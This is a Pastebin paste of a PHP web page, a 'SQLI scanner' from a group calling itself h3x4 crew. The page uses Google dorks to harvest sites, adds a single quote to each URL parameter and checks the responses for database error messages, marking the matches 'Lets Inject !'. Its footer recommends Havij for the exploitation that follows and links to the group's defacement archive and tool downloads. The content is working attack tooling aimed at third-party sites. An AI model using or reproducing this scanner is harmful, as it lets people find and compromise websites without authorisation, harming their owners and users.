Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <title>h3x4 crew - SQLI scanner</title>
- <style>
- body{
- background: #0F0F0F;
- color: #A9A9A9;
- font-family: monospace;
- font-size: 12px;
- }
- input{
- background: #808080;
- border: 1px solid #000000;
- color: #E6E6FA;
- }
- h2{
- color: #E6E6FA;
- }
- a{ color: #5A5A5A; text-decoration: none; }
- a:visited, a:active{ color: #5C5C5C; text-decoration: line-through; }
- a:hover{ color: #00FFCC; text-decoration: line-through; }
- .effectok:hover { text-decoration: underline; }
- .effectfalse:hover { text-decoration: line-through; }
- </style>
- <LINK REL="SHORTCUT ICON" HREF="http://scanner.masterskillstudent.com/favicon.ico">
- </head><center>
- <body align="center">
- <small><small>How to edit dork : inurl:[<span
- style="color: rgb(255, 255, 51);">filename</span>].php?id=+site:[<span
- style="color: rgb(255, 255, 51);">countrycode</span>]<br>
- example : inurl:<span style="color: rgb(255, 255, 51);">news</span>.php?id=+site:<span
- style="color: rgb(255, 255, 51);">id</span> ( scan
- file <span style="color: red;">news.php</span> for <span
- style="color: red;">Indonesia</span> site )</small></small>
- <br>
- <?php
- echo "<h2>SQLI vulnerable site checker</h2>";
- echo "<form action='' method='post'>";
- echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?id=+site:my'></p>";
- echo "<input type='submit' value=' Hack! '>";
- echo "<hr><br />";
- if($_POST['dork']) {
- @set_time_limit(0);
- @error_reporting(0);
- @ignore_user_abort(true);
- ini_set('memory_limit', '128M');
- $google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";
- $i = 0;
- $a = 0;
- $b = 0;
- while($b <= 10000) {
- $a = 0;
- flush(); ob_flush();
- echo "@ Site Checked : [ $b ]<br />";
- echo "@ Dork used : [ <b>".$_POST['dork']."</b> ]<br />";
- echo "@ Scanning in Process ! .<br />";
- flush(); ob_flush();
- if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
- echo "See something but not found??<br />";
- flush(); ob_flush();
- break;
- }
- preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
- echo "Result of injection...<br />";
- flush(); ob_flush();
- while(1) {
- if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
- echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='yellow'>Lets Inject ! </font><br />";
- } else {
- echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>Just Leave it! </font><br />";
- flush(); ob_flush();
- }
- if($a > count($sites[2])-2) {
- echo "Lets..scan other page.. <br />";
- break;
- }
- $a = $a+1;
- }
- $b = $b+100;
- }
- }
- function Connect_Host($url) {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_TIMEOUT, 30);
- $data = curl_exec($ch);
- if($data) {
- return $data;
- } else {
- return 0;
- }
- }
- function Clean($text) {
- return htmlspecialchars($text, ENT_QUOTES);
- }
- ?>
- </center>
- </body>
- </html>
- <br><div style="text-align: center;"><span
- style="font-family: Arial; color: rgb(204, 0, 0);"><span
- style="font-weight: bold;">S</span><small>Q</small><big><big>L</big></big>I
- <small>scanner</small></span><br
- style="font-family: Arial;">
- <span style="font-family: Arial;">[ <big
- style="font-weight: bold;"><span
- style="color: rgb(0, 0, 153);">h</span><span
- style="color: yellow;">3</span><span
- style="color: red;">x</span><span
- style="color: white;">4</span> <span
- style="color: red;">c</span><span
- style="color: white;">r</span><span
- style="color: red;">e</span><span
- style="color: white;">w</span></big> ]</span><br
- style="font-family: Arial;">
- <small><small><span style="font-family: Arial;">-Fakyu Tuyu , Cyg Selalu , Shah MIRC , Damien faisal , hexon , Fiqri Shah , Amy Barin , Pidot , Ery Ramlee , Pak Arab , Black Hand ( syam92x ) , hambamalam , wanwawan , masokis , akeem , iawaho , pii VVip , Dboyz , d3r1s</span></small></small><br
- style="font-family: Arial;">
- <small><small><span style="font-family: Arial;">-
- Special Thanks to Syam92x ( Black Hand )</span></small></small>
- <br>
- <br>Notes : When u get the site is vulnerable sqli , u are adviseable to use Havij , so ur hacking process more easier!
- <br><a href="http://scanner.masterskillstudent.com/Tools.html" target="_blank">Download tools</a> | <a href="countrylist.txt" target="_blank">Country ID</a> | <a href="http://zone-h.org/archive/notifier=h3x4%20crew" target="_blank">h3x4 crew</a> | <a href="dorklist.txt" target="_blank">Dork List</a>
- <br>
- <a href="http://www.quick-counter.net/" title="HTML hit counter - Quick-counter.net"><img src="http://www.quick-counter.net/aip.php?tp=bd&tz=Europe%2FLondon" alt="HTML hit counter - Quick-counter.net" border="0" /></a>
- </div>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement